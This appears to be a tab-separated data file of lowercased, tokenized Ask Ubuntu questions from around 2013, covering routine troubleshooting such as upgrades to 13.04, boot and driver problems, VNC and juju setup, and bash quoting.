288629	special character and parsing bug - bashscript	failed to parse arguments : argument to `` -- command/-e '' is not a valid command : text ended before matching quote was found for `` . ( the text was ' '' cpulimit ' ) this is what i get when i run the following script in terminal # ! /bin/bash read -p `` which program u want to limit its processes ? '' programename read -p `` which limitation percentage u want for it ? '' limitationpercentage getallpidrununderthisprogram= $ ( ps -e | grep `` $ programename '' | awk ' { print $ 1 ; } ' ) for i in $ getallpidrununderthisprogram do gnometab+= '' -- tab -e \ '' cpulimit -p $ i -l $ limitationpercentage \ '' `` done gnome-terminal $ gnometab he cant parse the escape character `` \ '' which it has to be used because of the double quote in line 8 gnometab+= '' -- tab -e \ '' cpulimit -p $ i -l $ limitationpercentage \ '' `` , so is there a solution to use the double quote as they are mandatory to be used after -- tab -e `` some commands `` and not to get the problem of parsing ?
288631	apt-get retries download endlessly	may be i am putting this wrong . i have this problem : for some packages apt-get retries download endlessly ( but does not get stuck ) , like this : need to get 19.3 mb/20.0 mb of archives . after this operation , 28.7 kb of additional disk space will be used . do you want to continue [ y/n ] ? get:1 http : //mirrors.cat.pdx.edu/ubuntu/ quantal-updates/main linux-firmware all 1.95.1 [ 19.3 mb ] get:2 http : //mirrors.cat.pdx.edu/ubuntu/ quantal-updates/main linux-firmware all 1.95.1 [ 19.3 mb ] get:3 http : //mirrors.cat.pdx.edu/ubuntu/ quantal-updates/main linux-firmware all 1.95.1 [ 19.3 mb ] get:4 http : //mirrors.cat.pdx.edu/ubuntu/ quantal-updates/main linux-firmware all 1.95.1 [ 19.3 mb ] get:5 http : //mirrors.cat.pdx.edu/ubuntu/ quantal-updates/main linux-firmware all 1.95.1 [ 19.3 mb ] it is able to complete the download , but keeps on retrying to get linux-firmware forever . hitting ctrl-c works , but i can not complete the upgrade . the same thing happens with some other packages ( for example openjdk-7-jre-headless ) . i am using a virtualbox vm and i can download those packages from a browser , but it takes very long to complete the download ( some sort of network connectivity issue ) . i get a decent connection to the mirror though . is there a fix or workaround for this ?
288634	can not login graphically after update to 13.04	i can not log in to a particular user 's account in x after upgrade to 13.04 . the password is accepted , the screen goes blank but rather than getting the desktop i am quickly returned to the login screen . i can log in as that user if i go to a text console using ctrl+alt+f1 . i can log in as other users in x. i have switched to gdm but the results are the same . i have also installed gnome-shell and xfce and but can not log in to them either . where should i look to troubleshoot this problem ?
288635	how to edit , read kannada documents created on microsoft word with nudi ekabhashe fonts on ubuntu ? and vice versa ?	how to read , edit kannada documents created on libreoffice with unicode fonts ( kedage lohit etc ) on microsoft word in windows.how to ensure inter-operability in both ways ?
288640	window contents disappear after maximizing	window contents usually disappear after maximizing them ! especially firefox . running ubuntu 12.1 on vaio z56 laptop . i 've read this question before and do everything that was said in the answer but they did n't work for me . enter link description here
288642	problems with system icompatibility with sxe injected	after steam was released in linux systems , i 've downloaded counter-strike 1.6 to play with some of my friends , but the marjority of the servers are protected with sxe injected . so ive downloaded and installed it with wine . but when i open it a message saying `` system altered , incompatible software detected '' what i think it means that sxe thinks ive a hack running . btw my system is 12.04 lts any solutions ? thanks .
288644	ctrl + home ( or end ) combination not working	i usually use the combination ctrl + home or ctrl + end to move the cursor to the beginning or to the end of a line . suddenly these combination is not working anymore ! can anyone help ?
288647	vnc using lightdm and x11vnc disconnects immediately after valid login	starting with a precise 64-bit server install , i configured the following ; sudo apt-get install lightdm x11vnc sudo dpkg-reconfigure lightdm in /etc/init/x11vnc.conf , i placed ; start on login-session-start script /usr/bin/x11vnc -xkb -auth /var/run/lightdm/root/:0 -noxrecord -noxfixes -noxdamage -forever -bg -rfbport 5900 -o /var/log/x11vnc.log end script using ultravnc from windows , i connect and enter valid login information , and the window immediately closes . the vnc log shows ; 30/04/2013 16:52:01 got connection from client 10.0.2.2 30/04/2013 16:52:01 other clients : 30/04/2013 16:52:01 disabled x server key autorepeat . 30/04/2013 16:52:01 to force back on run : 'xset r on ' ( 3 times ) 30/04/2013 16:52:01 incr accepted_client=1 for 10.0.2.2:61281 sock=8 30/04/2013 16:52:01 client protocol version 3.8 30/04/2013 16:52:01 protocol version sent 3.8 , using 3.8 30/04/2013 16:52:01 rfbprocessclientsecuritytype : executing handler for type 1 30/04/2013 16:52:01 rfbprocessclientsecuritytype : returning securityresult for client rfb version > = 3.8 30/04/2013 16:52:01 copy_tiles : allocating first_line at size 33 30/04/2013 16:52:02 pixel format for client 10.0.2.2 : 30/04/2013 16:52:02 32 bpp , depth 24 , little endian 30/04/2013 16:52:02 true colour : max r 255 g 255 b 255 , shift r 16 g 8 b 0 30/04/2013 16:52:02 no translation needed 30/04/2013 16:52:02 rfbprocessclientnormalmessage : ignoring unsupported encoding type enc ( 0x0000000a ) 30/04/2013 16:52:02 rfbprocessclientnormalmessage : ignoring unsupported encoding type zlibhex 30/04/2013 16:52:02 using compression level 6 for client 10.0.2.2 30/04/2013 16:52:02 enabling x-style cursor updates for client 10.0.2.2 30/04/2013 16:52:02 enabling full-color cursor updates for client 10.0.2.2 30/04/2013 16:52:02 enabling cursor position updates for client 10.0.2.2 30/04/2013 16:52:02 using image quality level 6 for client 10.0.2.2 30/04/2013 16:52:02 rfbprocessclientnormalmessage : ignoring unsupported encoding type xorenable 30/04/2013 16:52:02 enabling lastrect protocol extension for client 10.0.2.2 30/04/2013 16:52:02 enabling newfbsize protocol extension for client 10.0.2.2 30/04/2013 16:52:02 rfbprocessclientnormalmessage : ignoring unsupported encoding type cacheenable 30/04/2013 16:52:02 rfbprocessclientnormalmessage : ignoring unsupported encoding type enc ( 0xffff8000 ) 30/04/2013 16:52:02 rfbprocessclientnormalmessage : ignoring unsupported encoding type enc ( 0xffff8001 ) 30/04/2013 16:52:02 rfbprocessclientnormalmessage : ignoring unsupported encoding type enc ( 0xffff8002 ) 30/04/2013 16:52:02 rfbprocessclientnormalmessage : ignoring unsupported encoding type enc ( 0xffff8003 ) 30/04/2013 16:52:02 rfbprocessclientnormalmessage : ignoring unsupported encoding type enc ( 0xc0a1e5ce ) 30/04/2013 16:52:02 using zrle encoding for client 10.0.2.2 30/04/2013 16:52:03 pixel format for client 10.0.2.2 : 30/04/2013 16:52:03 32 bpp , depth 24 , little endian 30/04/2013 16:52:03 true colour : max r 255 g 255 b 255 , shift r 16 g 8 b 0 30/04/2013 16:52:03 no translation needed 30/04/2013 16:52:03 rfbprocessclientnormalmessage : ignoring unsupported encoding type enc ( 0x0000000a ) 30/04/2013 16:52:03 rfbprocessclientnormalmessage : ignoring unsupported encoding type zlibhex 30/04/2013 16:52:03 using compression level 6 for client 10.0.2.2 30/04/2013 16:52:03 enabling x-style cursor updates for client 10.0.2.2 30/04/2013 16:52:03 enabling full-color cursor updates for client 10.0.2.2 30/04/2013 16:52:03 enabling cursor position updates for client 10.0.2.2 30/04/2013 16:52:03 using image quality level 6 for client 10.0.2.2 30/04/2013 16:52:03 rfbprocessclientnormalmessage : ignoring unsupported encoding type xorenable 30/04/2013 16:52:03 enabling lastrect protocol extension for client 10.0.2.2 30/04/2013 16:52:03 enabling newfbsize protocol extension for client 10.0.2.2 30/04/2013 16:52:03 rfbprocessclientnormalmessage : ignoring unsupported encoding type enc ( 0xffff8000 ) 30/04/2013 16:52:03 rfbprocessclientnormalmessage : ignoring unsupported encoding type enc ( 0xffff8001 ) 30/04/2013 16:52:03 rfbprocessclientnormalmessage : ignoring unsupported encoding type enc ( 0xffff8002 ) 30/04/2013 16:52:03 rfbprocessclientnormalmessage : ignoring unsupported encoding type enc ( 0xffff8003 ) 30/04/2013 16:52:03 rfbprocessclientnormalmessage : ignoring unsupported encoding type enc ( 0xc0a1e5ce ) 30/04/2013 16:52:03 switching from zrle to hextile encoding for client 10.0.2.2 30/04/2013 16:52:03 client_set_net : 10.0.2.2 0.0015 caught xio error : 30/04/2013 16:52:07 deleted 32 tile_row polling images . tail : x11vnc.log : file truncated 30/04/2013 16:52:08 passing arg to libvncserver : -rfbport 30/04/2013 16:52:08 passing arg to libvncserver : 5900 any ideas what i 'm missing ?
288652	ubuntu 12.04 sees ntfs partition but not windows 7	trying to install ubuntu on a windows machine running windows 7 . i started by using the wubi , but when i restarted the computer it just went straight to windows . then i went into the disk management on windows , shrank the volume by 30gb , setup the 30gb non-allocated space as e drive with fat32 and restarted the computer with a usb live setup of ubuntu . i went into run ubuntu from usb , started the installer and it does n't detect my windows install . when i hit the option to `` do something else '' it sees the ntfs partition and the fat32 partition ( which i then reformatted as ext3 ) . the windows partition is /dev/sda1 but for whatever reason the installer does n't know that it is windows 7 . i ran sudo fdisk -lu disk /dev/sda : 320.1 gb , 320072933376 bytes 240 heads , 63 sectors/track , 41345 cylinders , total 625142448 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x6c3782f5 device boot start end blocks id system /dev/sda1 * 2048 563697663 281847808 7 hpfs/ntfs/exfat /dev/sda2 563697664 625137663 30720000 7 hpfs/ntfs/exfat disk /dev/sdb : 8103 mb , 8103395328 bytes 255 heads , 63 sectors/track , 985 cylinders , total 15826944 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 device boot start end blocks id system /dev/sdb1 * 2048 15826943 7912448 b w95 fat 32 the windows 7 partition is not showing up when i run blkid /dev/loop0 : type= '' squashfs '' /dev/sdb1 : label= '' pendrive '' uuid= '' fc0f-1ff1 '' type= '' vfat '' if i go through the install and select to put it on the /dev/sda2 , then whenever i reboot the computer it goes directly to ubuntu , no option for windows ... . no grub , nothing . it should be noted that this is a work owned computer that has a full disk encryption on it . i am guessing that might be the problem , but i really do n't know . i am trying to do this on a computer that belongs to another guy on the project . my computer has a full disk encryption ( different brand ) and i have ubuntu 12.04 lts on it with no problems . any advice on how to move forward would be really helpful !
288655	can not click in some windows , ubuntu 13.04 64bit	edit : i tryed both , lightdm and gdm . ''sudo restart lightdm '' helps temporarly . i can not click in firefox until i start something else e.g . shell . but than the mouse can not click anything outside the firefox window and keystrokes still go to the shell . when i bring up the launcher with windows key i cannnot click the program icons , but i can select them with arrow keys . when i try to start catalyst control center an error message warns me that the mouse can not be accessed and that there might be a virus . maybe related to this problem ? mouse clicks ignored by applications on 12.10 new install
288658	wireless on samsung q530 stop working after upgrading to 13.04	the saved password is still the same in the wireless config under system settings . the system sees all of the available networks , but cant connect to my home wifi . this worked fine in ubuntu 12.10 . don
288661	multiple pulseaudio multicast `` channels ''	i 'm running a ubuntu server , i 've configured it with a pulseaudio rtp multicast sink . this sink is in use for a multitude of applications . what i 'm looking for now is if there is a way to have an additional `` channel '' for rtp multicasts , so the same computer can multicast different streams at the same time , and if i can then configure my computer to just accept one of those channels . it could be compared to different zones in a home audio sound system , where every zone would have it 's own multicast `` channel '' is this possible , and in that case how would it be accomplished ?
288662	internet connection doesnt work properly	i have a problem with my internet connection on xubuntu 13.04 . sometimes it works perfectly , but sometimes it is very slow or doesnt work at all and i have to refresh page or restart installation in software center for several times . i have a dual boot with win7 and there is everything alright . please help .
288669	ubuntu 13.04 boot problem . devices are being listed	after i installed nvidia driver whenever i start up ubuntu 13.04 it stays approximately 1 minutes as image shown in link below . then it shows me a black screen , when i press power button , closing screen is coming up and stays `` will now halt '' . what is the problem with it ?
288671	python - nameerror : global name 'plus ' is not defined	so i am creating a program using shelve and i keep getting this error message . i can not for the life of me figure it out and google has n't been much help . is this a problem with ubuntu/python working together , or an error in my program ? 'plus ' is the name of my shelve file and i am trying to open a new shelve file to write to . here 's my idle console screen when it dies : traceback ( most recent call last ) : file `` /media/windows-xp-pro/python32/scripts/plu.py '' , line 217 , in < module > start ( ) file `` /media/windows-xp-pro/python32/scripts/plu.py '' , line 147 , in start end ( ) # go to the end ( ) definition file `` /media/windows-xp-pro/python32/scripts/plu.py '' , line 110 , in end dplu = shelve.open ( plus ) nameerror : global name 'plus ' is not defined any help would be appreciated
288678	installing ubuntu 13.04 on external hdd safer than dual boot with windows 8 on samsung np780z5e	with all the samsung/linux boot scares , would it be safer to just install to an external hdd ? . i have a samsung chronos series 7 touchsreen np780z5e .
288681	juju with maas error : file 'provider-state ' not found	i 'm trying to configure juju to work w/ maas . i 'm configuring juju to run on the same node as maas . when i run `` juju status '' i get the following error : error : file 'provider-state ' not found any thoughts ? here are the relevant parts from my .juju/environments.yaml : maas : type : maas # change this to where your maas server lives . it must specify the base path . maas-server : 'http : // < server ip > /maas/' maas-oauth : ' < key from maas preferences page > ' admin-secret : 'nothing' default-series : precise authorized-keys-path : ~/.ssh/id_rsa.pub
288687	permission denied when using ./configure	i tried to install reaver . the read me file gives a procedure and the first step is to use the following code in the corresponding location . root @ ubuntu : /media/new volume/reaver-1.4/src # ./configure this was the result bash : ./configure : permission denied i tried changing the file permission using chmod . but after the command is executed it changes it 's permission back to the default one .
288690	sound card problem after upgrading to 13.04	i upgraded ubuntu 12.10 to 13.04 and the sound card is n't working anymore any help ?
288691	how to get a system nouveau-free	nouveau is giving me a hell of a lot of problems , and i would like to start without it altogether . i removed basically everything , up to libdrm-nouveau1a , because plymouth depends on it and if i try to remove plymouth , the whole system goes with it . how can i obtain a system completely free from nouveau ? is it even possible ? version is ubuntu 12.04
288702	rootstock not working	i am getting this error : ./rootstock : 1000 : ./rootstock : can not create /tmp/tmp.c7sayhcaxf/tmpmount/etc/fstab : directory nonexistent ubuntu 13.04 when i want to create simple qemu image with this command : sudo ./rootstock -- fqdn qemu-test -- login qemu -- password qemupwd -- notarball im using ubuntu 13.04 any info ?
288704	how do i get dhclient to start when i login and start as root ?	i 've messed up my ubuntu . i uninstalled something that network-manager depended on and now i have to start the dhclient manually every time i log in . i 've got a script that does the sudo dhclient eth0 but i have to punch in my password twice to log in : once for the actual login and twice to get my dhcp running . how can i get dhclient just running automagically at every login ?
288711	what kind of animal is a pangolin as in `` precise pangolin '' ?	i have a question . might not be ubuntu-related but it 's worth trying . for those who are wondering , yes , i have a ubuntu laptop . so , this laptop is running 12.04 , and i picked the `` precise pangolin '' background . and may i ask : what kind of animal is that ? i 've been wondering what is that for a long time .
288713	cant boot windows 7 after boot-repair	i originally have windows 7 64 bits , then i tried to dual-boot with ubuntu 13.04. but after installation my computer was only able to boot windows ( ubuntu was not there as option ) . so i boot from ubuntu live cd and ran boot-repair . after this , computer startup with ubuntu only . windows is no longer accessible . how can i fix it ? i want to be able to run both os . my boot-info is here . thanks in advance .
288714	ubuntu server taking up 24gb is normal ?	i installed ubuntu server x86 12 . * then i used the command supplied at the community wiki to install xubuntu 's gui ( cuz i 'm a newb ) sudo apt-get install xubuntu-desktop then installed : xampp ( lampp variant ) ruby nodejs among other tiny applications , and no data what so ever now when i do a size check using discus it shows me that i 'm using up 24gb of my 25gb partition . this ca n't be normal is it ? what tools do i have to investigate further ? thank 's for all your help : )
288717	i also lost sound capability after upgrading to 13.04	my speaker settings are currently digital output ( s/pdif ) , output volume 100 % . i have also tested the sound with analog output . my audio device is intel corp. 82801ji ( ich10 family ) hd audio controller . i have hardware device intel [ hda intel ] listed for devices 0 : alc888 analog , 1 : alc888 digital , and 3 : hdmi 0 .
288726	ca n't decrypt files - passphrase does n't work	i have the exact same problem as this gentleman had here : encrypted home ... forgotten password , but no passphrase , i had an old user with with encrypted /home folder and changed the password from another user to be able to login again . i still have the encryption key stored but the password does n't work ( tried the old and the new one ) . what can i do now ? i can only mount the encrypted partition but the files are still encrypted and i ca n't view them . thanks in advance .
288730	want to create new dolphin window from unity launcher	i installed the dolphin file manager when ubuntu 13.04 's file manager stopped supporting expandable folders in the file pane . sometimes i like to have separate dolphin instances running in my various unity work spaces . as it is , i can open an existing dolphin instance , open the file menu , and select `` new window '' to create a new dolphin instance . i can then move the new dolphin instance to the appropriate workspace . i would rather , from appropriate workspace , right click the dolphin file manager icon in the unity launcher bar and select an option that says , `` new window '' . unfortunately , that option does not exist . i tried opening a terminal and entering the following commands : gsettings get com.canonical.unity.launcher favorites cd /usr/share/applications/ gksudo gedit unity : //expo-icon my effort failed ; dolphin is not launched from a *.desktop file . can someone please tell me how to add a `` new window '' option to the dolphin icon in the unity launcher ?
288733	how to force minimize or switch a video / game - bug ?	i 'm comming from windows 7 , and something that i loved there was to alt+tab in any game or video and switch to another app without problem . here , i tried with age of mythology ( wine ) , that i play it a lot , and saw that it ca n't minimize it and switch to another app . mouse pointer is in another side but you 're seeing the game ... i though that was wine 's bug , but now i tried with a video with standard ubuntu 13.04 video player . when it 's on full screen i try to alt+tab , ctrl+super+d , and some other commands and it ca n't minimize or switch . i only see bugs when trying ... ... . is not possible ? ? ? : o
288734	second hard drive is n't showing up in the asus bios but is showing up in ubuntu disks application	i built a computer for my music this weekend , i have a little problem though ; my seagate 1tb hard drive is n't showing up in the asus bios screen when i connected it . it 's showing up in ubuntu disks application and it is n't partitioned or formatted yet , is that preventing it from showing up in bios screen , or is it caused by something else ? when i disconnect my ssd , my 1tb hard drive shows up in the bios screen , but not when my both hard drives are connected . so does that mean it 's detected ? how do i partition and format a hard drive to both ubuntu and windows format , so i can install my windows software i use daily and my computer internal components on ubuntu ? components : asus p8h61-mle/csm r2.0 h61 lga 1155 micro ata motherboard intel pentium g860 sandy bridge 3.0ghz lga1155 65w processor ark technology pn03 matx mini-tower pc case ( black ) with 500w psu asus dwr-24b1st internal sata dvd-rw drive ( black ) intel fan- 1155 lga 1155 cooling fan base seagate st1000vm002 1tb 3gb/s pipelinehd sata 2 hard drive evga 01g-p3-1312-lr geforce 210 pcle 2.0 x 16 1gb video card filemate 3fmpcimwn-r 802 11n/g wireless n pcl wifi network adapter corsair cssd-f120gb2-rf2 force 2.5 120gb sata 2 ssd g skill f3-17000cl 11d-8gbsr sniper 8gb ( 2x4gb ) ddr3-2133mhz ram
288735	how to tab to next file when renaming ?	if i am renaming a bunch of files in nautilus quickly , when i hit enter the file jumps to its proper place alphabetically . but that means i have to go back and find the next file i wanted to rename . is there any way to easily tab to the next file when renaming , like in windows ? i tried various keys but nothing works . note : i am not looking for a batch renamer like the rename command , i am renaming a handful of files with no pattern to them .
288736	ubuntu 13.04 will not shutdown	i have just upgraded my computer from ubuntu 12.10 to ubuntu 13.04 , and now when i go to turn off my computer , it will not shut down fully . the power supply keeps running , even when it is `` off '' any suggestions please ?
288739	magnet links do n't work in google chrome	just some days ago magnet links stopped working in google chrome , but it works fine in firefox . tested to disable all extensions , but it still do n't work . any suggestions ? running ubuntu 12.04.2 .
288741	hard drive does n't go to sleep when is not in use	is there a way to stop the hard drive when its not in use ? like an energy saver feature ? i have a mackbook black series . thanks in advance . l .
288744	ca n't connect to ethernet with atheros ar8161 on ubuntu 12.04.2	i have read most of the answers that seem relevant to this , but i thinlk my issue is different and i have n't found the answer . i have a new hp pavilion hpe h8-1360t computer . it has windows 7 and ubuntu 12.04.2 in a dual boot configuration . it has a ralink corp. rt5390 wireless 802.11n wifi controller and an atheros communications inc. ar8161 ethernet controller . i have two lynksys wrt160n routers connected to different wans and using dhcp for lan client conmnections . in windows i can connect to the routers via wifi and via wired ethernet . in ubuntu , i can connect fine via wifi , but ethernet connections 'try ' for a while and then give 'wired network disconnected ' . it appears i have the required driver and sudo modprobe alx executes without error , but i can never establish a wired ethernet connection . $ lspci | grep ^0 [ 34 ] 03:00.0 network controller : ralink corp. rt5390 wireless 802.11n 1t/1r pcie 04:00.0 ethernet controller : atheros communications inc. ar8161 gigabit ethernet ( rev 08 ) $ sudo lshw -c network *-network description : wireless interface product : rt5390 wireless 802.11n 1t/1r pcie vendor : ralink corp. physical id : 0 bus info : pci @ 0000:03:00.0 logical name : wlan0 version : 00 serial : 20:10:7a:89:4d : ef width : 32 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=rt2800pci driverversion=3.5.0-27-generic firmware=0.34 ip=192.168.1.158 latency=0 link=yes multicast=yes wireless=ieee 802.11bgn resources : irq:16 memory : f7200000-f720ffff *-network description : ethernet interface product : ar8161 gigabit ethernet vendor : atheros communications inc. physical id : 0 bus info : pci @ 0000:04:00.0 logical name : eth0 version : 08 serial : 70:54 : d2:97:05:11 size : 100mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm pciexpress msi msix bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=alx driverversion=1.2.3 duplex=full firmware=n/a latency=0 link=yes multicast=yes port=twisted pair speed=100mbit/s resources : irq:17 memory : f7100000-f713ffff ioport : d000 ( size=128 ) $ ifconfig eth0 link encap : ethernet hwaddr 70:54 : d2:97:05:11 inet6 addr : fe80 : :7254 : d2ff : fe97:511/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:306 errors:0 dropped:0 overruns:0 frame:0 tx packets:1617 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:174710 ( 174.7 kb ) tx bytes:335752 ( 335.7 kb ) interrupt:17 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:1401 errors:0 dropped:0 overruns:0 frame:0 tx packets:1401 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:112404 ( 112.4 kb ) tx bytes:112404 ( 112.4 kb ) wlan0 link encap : ethernet hwaddr 20:10:7a:89:4d : ef inet addr:192.168.1.158 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :2210:7aff : fe89:4def/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:7621 errors:0 dropped:0 overruns:0 frame:0 tx packets:6083 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:3181961 ( 3.1 mb ) tx bytes:911510 ( 911.5 kb ) it seems that eth0 is up and that there is some communication , but i still get the 'wired network disconnected ' alerts every minute or so and do n't ever get connected . also it seems that if this were some dhcp protocol issue , the wifi connection to the same router would n't work either . i am lost . can anyone help ?
288750	how to make the wacom bamboo splash pen ctl-471 work on lucid lynx 10.04 ?	i 've tried many sites and none of them have worked thus far . when i plug my wacom bamboo splash pen ( ctl-471 ) , the tablet lights up and it responses to the pen , but nothing is working . no response from my computer when i move the pen over the active area . how can i get it to work ? i 'm using the ubuntu lucid lynx 10.04 with the version 2.6.32-46-generic kernel . when i type in lsusb , it shows up as `` bus 004 device 006 : id 056a:00dd wacom co. , ltd `` . update ( apr 30 , 2013 ) i tried lekensteyn 's way : sudo add-apt-repository ppa : lekensteyn/wacom-tablet sudo apt-get update sudo apt-get install wacom-dkms everything worked until i entered sudo apt-get update . the terminal starts spitting out lines until it reaches an error : ... hits and igns ... err http : //ppa.launchpad.net lucid/main packages 404 not found err http : //ppa.launchpad.net lucid/main packages 404 not found hit http : //packages.medibuntu.org lucid release hit http : //packages.medibuntu.org lucid/free packages hit http : //packages.medibuntu.org lucid/non-free packages w : failed to fetch http : //ppa.launchpad.net/irie/wacom/ubuntu/dists/lucid/main/binary-amd64/packages.gz 404 not found w : failed to fetch http : //ppa.launchpad.net/lekensteyn/wacom-tablet/ubuntu/dists/lucid/main/binary-amd64/packages.gz 404 not found e : some index files failed to download , they have been ignored , or old ones used instead . then i tried to go to software sources and add the apt line ppa : lekensteyn/wacom-tablet and nothing happened . the window for adding the apt closes and i 'm left staring at the software sources window . i tried restarting and nothing changed . i 'm at a lost now .
288752	several questions about upgrading from 11.04 to 13.04	i still have the ubuntu 11.04 and i want to upgrade it to ubuntu 13.04 , but : i have a directory called /soft where i have several softwares that i have installed manually . if i make the upgrade on the operating system is there a way to mantain that directory , or ubuntu will just delete it all ? and what about documents such as the /home/ { myuser } /documents , what will happen to them ? will the installed softwares remain intact ? is it advisable to upgrade the os via terminal or is it better to format and install it all from scratch considering that there is a large gap between the os versions ?
288753	ugly separators in toolbars - ambiance - 13.04	can i fix or change the separators ' color for ambiance theme in toolbars ? it 's always white even if i change every value of `` separator '' in every config file of ambiance theme to be dark/black/not-white . thanks . image :
288757	terminal command to open url 's in default and non-default browser	i found this ask ubuntu question about how to open a url in your default browser using the terminal . basically , you use the command xdg-open http : //google.com my default browser is firefox . but lets say that i wanted to open a specific website in chrome , instead of firefox . is there a command to open it in chrome instead of firefox ?
288759	how to get rid of overheating in dell studio 1558 laptop installed with ubuntu 12.10 ?	i am using dell studio 1558 laptop . installed with ubuntu 12.10 it gets overheated many times and then system start to hang , how to get rid of this problem of overheating ? either i should increase the speed of fan , if yes then how ? if any other option then please suggest .
288764	windows7 virtualbox guest in seamless mode has bottom clipped off in ubuntu 13.04	i recently installed ubuntu 13.04 and virtualbox 4.2.10-dfsg-0ubuntu2 with guest extensions installed and my windows7 guests running in seamless mode have the bottom part chopped off . the windows start button is slightly taller so it peaks out from below and that visible bit is clickable . this did not occur in 12.04 . it seems like the virtualbox seamless boundaries end too high up ( perhaps they start at the top behind the ubuntu top panel ) and the boundaries are not in sync with the windows guest , or else the windows start menu/taskbar would also just appear higher up and not chopped off at the bottom of the screen . i have tried enabling the 3d acceleration mode for the vm but that did n't help . edit : i am running the proprietary nvidia graphics drivers ( nvidia-310 310.44-0ubuntu2 ) i have disabled the global menu i am using sloppy mouse focus i will try to put this back to stock ubuntu 13.04 and see if that fixes the problem . update : restoring global menus did not fix the problem . update ( 2013-05-02 ) : i was resizing the window of a program running in the windows7 guest and when my mouse cursor hit the bottom of the screen , it seems the entire guest desktop pans down . but this left things less usable so i had to restart the guest vm . i suspect this has something to do with the interaction between unity 's top panel and virtualbox since the effected parts are the height of the top panel .
288769	how do i configure juju for use on azure ?	i usually setup my entire stack with apt-get packages , however i thought i might give juju a try . i 'm using a fresh copy of ubuntu 13.04 on azure . i managed to install install the juju package and create the config file by running juju generate-config -w. however , i ca n't seem to move any further . attempting to run juju boostrap results in an error which requests that i provide an access-key or secret-key . i have no idea where to find these credentials or if i should be using openstack mode ? i could not seem to find any documentation specifically for configuring juju on an azure ubuntu vm . any help would be appreciated !
288773	self contained mp3 application	what is the best way to install an mp3 application ( vlc , exaile , amarok , mpg123 , etc.. ) with no external plugin dependencies . my use case is this , i am running in a live environment ( ubuntu 12.04 ) and want to be able to play mp3 files on the machine . the mp3 files may be on a possibly damaged harddrive or on another mounted device . i have a set of backup/recovery programs and scripts on a usbstick and would like to supplement it with an mp3 application as well . i do n't mind compiling an application but i 'd rather have a binary and not a .deb file . command line is ok but i 'd prefer gui . so with these requirements what are my options ?
288774	installed ubuntu , windows 7 boots up by default ?	i have windows 7 installed in my c : \ partition .now i just installed ubuntu 13.04 on my d : \ partition , but i do n't know how to boot to ubuntu ... . ? any help is much appreciated !
288775	can not change background color in ubuntu 13.04	i can not change my background to the color blue and when i try to my desktop background goes black . i tried to do gsettings set org.gnome.settings-daemon.plugins.background active true but it still does not work .
288777	game dev tycoon : error loading libxrandr	i bought it from there site . i got a fresh install of ubuntu 13.04 . when i try to run game dev tycoon from the terminal i get the following error : gamedevtycoon : error while loading shared libraries : libxrandr.so.2 : can not open shared object file : no such file or directory
288782	printer job always 'stopped '	i am running ubuntu 12.10/ gnome 3 remix ( amd64 ) . when i try to print anything from my lexmark s605 interact , the job automatically stops under job status . i might be missing something really obvious , and i 'm quite new to this , so if there 's anything else you need to know , tell me . also , if anyone else uses this printer , how did you install it ? i 've tried both with and without the lexmark software , available from their website , and both with usb and with the network . i 'm pretty sure that i have all of the necessary programs installed ( or have had at one point ) and have tried with sudo , so i do n't think it 's permissions , but i 'm not sure . anyways , thanks in advance for your help .
288790	amd proprietary driver does n't let me see the temperature	i had a problem with higher gpu temperature in ubuntu than in windows , so i tried installing the proprietary driver for amd mobility radeon hd 5650 . now i ca n't see the temperature . does this mean that the sensor is unaccessible ? will my computer automatically shut down if the temperature goes above 100c ? note : i am using psensor to see the temperatures
288794	hitting alt does n't bring up the hud	i just noticed that the hud appears to be gone . i updated to 13.04 recently and tapping alt does n't do anything . the alt ( tap ) shortcut is even gone from the cheat sheet that appears when i hold super . is this normal ?
288798	unable to login to amazon instant video after upgrade to ubuntu 13.04	i upgrade from ubuntu version 12.10 , i had fixed this issue before by loading hal , but that fix does not work in version 13.04 . i ran the fix and still getting the following error : playback error , sorry , we are unable to steam this video . this is likely because your flash player needs to be updated . i attempted updating my flash player and it was already up to date . how can i troubleshoot this issue , i am new to ubuntu , just installed it for the first time today . i can run other apps that steam video .
288801	gmail notification on ubuntu 13.04	i 'm upgraded from 12.04 to 12.10 and then to 13.04 . in 12.04 i was usage with gm-notify to alert me when a message is coming in the messaging menu . in 13.04 its not shown in the messaging menu . there is another sample app that show in the messaging menu when message is coming to gmail ?
288803	ca n't mount drives automatically after upgrading to kubuntu 13.04	i guess it 's a problem with kio/dbus or something else since dmesg output is fine and i can mount drives manually from command line . since the upgrade process was not smooth and i had to sudo dpkg -a -- configure to complete the upgrade , i wonder if i 'm missing some packages . i also filed another question about not being able to connect to the internet at every boot but a sudo service networking restart seems to do the trick . i wonder if the two problems mentioned above are connected . can you kindly help me ? p.s . : dolphin is n't showing my internal hard drives ( but they get mounted anyway by fstab ) in the panel on the left anymore .
288807	syslinux error on boot , ubuntu 13.04	want to try out ubuntu 13.04 on my hp pavilion dv7 1132nr but i keep getting this error . syslinux 4.06 edd 2012-10-23 copyright ( c ) 1994-2012 h : peter anvin et al first of all , a few things : i tried many usb installers such as universal usb installer , lili , and unetbootin , all gave me the same result the drive was formatted before installation ( fat32 ) . the iso is n't corrupted , the md5 all checked out . i have another linux distro on this machine , would that cause this to happen ? the usb drive is a sandisk 16gb . hope one of you guys can fiqure this out .
